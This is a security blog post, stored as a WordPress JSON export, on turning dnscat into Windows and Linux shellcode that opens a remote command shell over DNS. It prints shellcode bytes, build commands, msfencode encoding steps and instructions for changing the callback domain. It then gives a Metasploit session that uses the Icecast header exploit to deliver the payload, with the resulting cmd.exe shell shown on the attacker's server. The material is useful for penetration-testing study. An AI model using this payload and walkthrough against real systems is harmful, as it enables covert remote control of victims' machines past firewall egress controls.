{"id":8,"date":"2015-03-28T09:50:38","date_gmt":"2015-03-28T09:50:38","guid":{"rendered":"http:\/\/piratesecurityblog.com\/?p=8"},"modified":"2016-09-28T09:50:48","modified_gmt":"2016-09-28T09:50:48","slug":"weaponizing-dnscat-with-shellcode-and-metasploit","status":"publish","type":"post","link":"http:\/\/piratesecurityblog.com\/?p=8","title":{"rendered":"Weaponizing dnscat with shellcode and Metasploit"},"content":{"rendered":"<p>I&#8217;ve been letting other projects slip these last couple weeks because I was excited about converting dnscat into shellcode (or &#8220;weaponizing dnscat&#8221;, as I enjoy saying). Even though I got into the security field with reverse engineering and writing hacks for games, I have never written more than a couple lines of x86 at a time, nor have I ever written shellcode, so this was an awesome learning experience. Most people start by writing shellcode that spawns a local shell; I decided to start with shellcode that implements a dnscat client in under 1024 bytes (for both Linux and Windows). 
Like I always say, go big or go home!<br \/>\n<span id=\"more-611\"><\/span><br \/>\nIf you just want to grab the files, here are some links:<\/p>\n<ul>\n<li><a href=\"https:\/\/blog.skullsecurity.org\/blogdata\/dnscat-shell-win32.asm\">Win32 shellcode &#8211; assembler<\/a><\/li>\n<li><a href=\"https:\/\/blog.skullsecurity.org\/blogdata\/dnscat-shell-win32\">Win32 shellcode &#8211; binary<\/a><\/li>\n<li><a href=\"https:\/\/blog.skullsecurity.org\/blogdata\/dnscat-shell-win32.h\">Win32 shellcode &#8211; C array<\/a><\/li>\n<li><a href=\"https:\/\/blog.skullsecurity.org\/blogdata\/dnscat-shell-win32.rb\">Win32 Metasploit module<\/a><\/li>\n<li><a href=\"https:\/\/blog.skullsecurity.org\/blogdata\/dnscat-shell-linux.asm\">Linux shellcode &#8211; assembler<\/a><\/li>\n<li><a href=\"https:\/\/blog.skullsecurity.org\/blogdata\/dnscat-shell-linux\">Linux shellcode &#8211; binary<\/a><\/li>\n<li><a href=\"https:\/\/blog.skullsecurity.org\/blogdata\/dnscat-shell-linux.h\">Linux shellcode &#8211; C array<\/a><\/li>\n<\/ul>\n<p>If you want to get your hands dirty, you can compile the source &#8212; right now, it&#8217;s only in svn:<\/p>\n<pre>svn co http:\/\/svn.skullsecurity.org:81\/ron\/security\/nbtool\r\ncd nbtool\r\nmake<\/pre>\n<p>That&#8217;ll compile both the standard dnscat client\/server and, if you have nasm installed, the Linux and Windows shellcodes. On Windows, you&#8217;ll need nasm to assemble it. I installed Cygwin, but you can compile the Windows shellcode on Linux or vice versa if you prefer. The output will be in samples\/shellcode-*\/. 
A .h file containing the C version will be generated, as well:<\/p>\n<pre>$ head -n3 dnscat-shell-test.h\r\nchar shellcode[] =\r\n        \"\\xe9\\xa2\\x01\\x00\\x00\\x5d\\x81\\xec\\x00\\x04\\x00\\x00\\xe8\\x4e\\x03\\x00\"\r\n        \"\\x00\\x31\\xdb\\x80\\xc3\\x09\\x89\\xef\\xe8\\x2e\\x03\\x00\\x00\\x80\\xc3\\x06\"\r\n...\r\n<\/pre>\n<p>And, of course, the raw file is output (without an extension), that can be run through msfencode or embedded into a script:<\/p>\n<pre> $ make\r\n[...]\r\n$ wc -c samples\/shellcode-win32\/dnscat-shell-win32\r\n997 samples\/shellcode-win32\/dnscat-shell-win32\r\n$ wc -c samples\/shellcode-linux\/dnscat-shell-linux\r\n988 samples\/shellcode-linux\/dnscat-shell-linux\r\n<\/pre>\n<p>Unless you want to be sending your cmd.exe (or sh) shell to skullseclabs.org, you&#8217;ll have to modify the domain as well &#8212; the very last line in the assembly code for both Windows and Linux is this:<\/p>\n<pre>get_domain:\r\n call get_domain_top\r\n db 1, 'a' ; random\r\n db 12,'skullseclabs' ; &lt;-- To modify domain, change this...\r\n db 3,'org' ; &lt;-- and this. The number is the section length.\r\n db 0\r\n<\/pre>\n<p>The two lines with the domain have to be changed. The number preceding the name is, as the comment says, the length of the section (&#8216;skullseclabs&#8217; is 12 bytes, and &#8216;org&#8217; is 3 bytes). This process is automated with the Metasploit payload, as you&#8217;ll see.<\/p>\n<h2>Encoding with msfencode<\/h2>\n<p>msfencode from the Metasploit project is a beautiful utility. I highly recommend running shellcode through it before using it. The most useful aspect with shellcode is, at least to me, the ability to eliminate characters. 
So, if I need to get rid of \\x00 (null) characters from my strings, it&#8217;s as easy as:<\/p>\n<pre>$ msfencode -b \"\\x00\" &lt; dnscat-shell-win32 &gt; dnscat-shell-win32-encoded\r\n[*] x86\/shikata_ga_nai succeeded with size 1024 (iteration=1)\r\n<\/pre>\n<p>If you&#8217;re planning on using this in, for example, Metasploit, you don&#8217;t have to worry about the msfencode step &#8212; it&#8217;ll do that for you.<\/p>\n<h2>Metasploit payload<\/h2>\n<p>Speaking of Metasploit, yes! I wrote a Metasploit payload for dnscat.<\/p>\n<p>First, there are a number of caveats:<\/p>\n<ul>\n<li>This is highly experimental<\/li>\n<li>This doesn&#8217;t have a proper &#8220;exitfunc&#8221; call &#8212; it just returns and probably crashes the process<\/li>\n<li>This is set up as a single stage, right now, and is 1000 or so bytes &#8212; as a result, it won&#8217;t work against most vulnerabilities<\/li>\n<li>The dnscat server isn&#8217;t part of Metasploit, yet, so you&#8217;ll have to compile and run it separately<\/li>\n<\/ul>\n<p>That being said, it also works great when it&#8217;s usable. The target I use for testing is <a href=\"http:\/\/downloads.xiph.org\/releases\/icecast\/icecast2_win32_2.0.0_setup.exe\">Icecast 2 version 2.0.0<\/a> (WARNING: don&#8217;t install vulnerable software on anything important!), which is included on the SANS 560 and 504 CDs (thanks Ed!). 
It&#8217;s free, GPL, reliable, and has 2000 bytes in which to stuff the payload.<\/p>\n<p>So, the steps you need to take are:<\/p>\n<ol>\n<li>Install <a href=\"http:\/\/downloads.xiph.org\/releases\/icecast\/icecast2_win32_2.0.0_setup.exe\">Icecast2<\/a> on your victim machine (Win32)<\/li>\n<li>Download the experimental dnscat <a href=\"https:\/\/blog.skullsecurity.org\/blogdata\/dnscat-shell-win32.rb\">Metasploit module<\/a> and put it in your Metasploit directory (modules\/payloads\/singles\/windows\/)<\/li>\n<li>Fire up a dnscat server on your authoritative DNS server (<tt>dnscat --listen<\/tt>) &#8212; see the <a href=\"https:\/\/blog.skullsecurity.org\/wiki\/index.php\/Dnscat\">dnscat wiki<\/a> for more information<\/li>\n<li>Run Metasploit (<tt>msfconsole<\/tt>) and enter the following commands:<\/li>\n<\/ol>\n<pre>msf &gt; use exploit\/windows\/http\/icecast_header\r\n\r\nmsf exploit(icecast_header) &gt; set PAYLOAD windows\/dnscat-shell-win32\r\nPAYLOAD =&gt; windows\/dnscat-shell-win32\r\n\r\nmsf exploit(icecast_header) &gt; set RHOST 192.168.1.221\r\nRHOST =&gt; 192.168.1.221\r\n\r\nmsf exploit(icecast_header) &gt; set DOMAIN skullseclabs.org\r\nDOMAIN =&gt; skullseclabs.org\r\n\r\nmsf exploit(icecast_header) &gt; exploit\r\n[*] Exploit completed, but no session was created.\r\n<\/pre>\n<p>Meanwhile, on your dnscat server, if all went well, you should see:<\/p>\n<pre>$ sudo .\/dnscat --listen\r\nWaiting for DNS requests for domain '*' on 0.0.0.0:53...\r\nSwitching stream -&gt; datagram\r\nMicrosoft Windows [Version 5.2.3790]\r\n(C) Copyright 1985-2003 Microsoft Corp.\r\n\r\nC:\\Program Files\\Icecast2 Win32&gt;\r\n<\/pre>\n<p>You can type commands in, and they&#8217;ll run just like a normal shell. Be warned, though, that it is somewhat slow, due to the nature of going through DNS.<\/p>\n<h2>Why bother?<\/h2>\n<p>The big advantage to this over traditional shellcode is that no port, whether inbound or outbound, is required! 
As long as the server has a DNS server set that will perform recursive lookups, it&#8217;ll work great!<\/p>\n<h2>Feedback<\/h2>\n<p>As I said, this is the first time I&#8217;ve ever written shellcode or x86. I&#8217;m sure there are lots of places where it could be significantly improved, and I&#8217;d love to hear feedback from the folks who really know what they&#8217;re doing and can help me improve my code.<\/p>\n<p>Thanks!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>I&#8217;ve been letting other projects slip these last couple weeks because I was excited about converting dnscat into shellcode (or &#8220;weaponizing dnscat&#8221;, as I enjoy saying). Even though I got into the security field with reverse engineering and writing hacks for games, I have never written more than a couple lines of x86 at a &hellip; <a href=\"http:\/\/piratesecurityblog.com\/?p=8\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">Weaponizing dnscat with shellcode and Metasploit<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[5],"tags":[],"_links":{"self":[{"href":"http:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/posts\/8"}],"collection":[{"href":"http:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/piratesecurityblog.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8"}],"version-history":[{"count":1,"href":"http:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/posts\/8\/revisions"}],"predecessor-version":[{"id":9,"href":"http:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/posts\/8\/revisions\/9"}],"wp:a
ttachment":[{"href":"http:\/\/piratesecurityblog.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/piratesecurityblog.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/piratesecurityblog.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}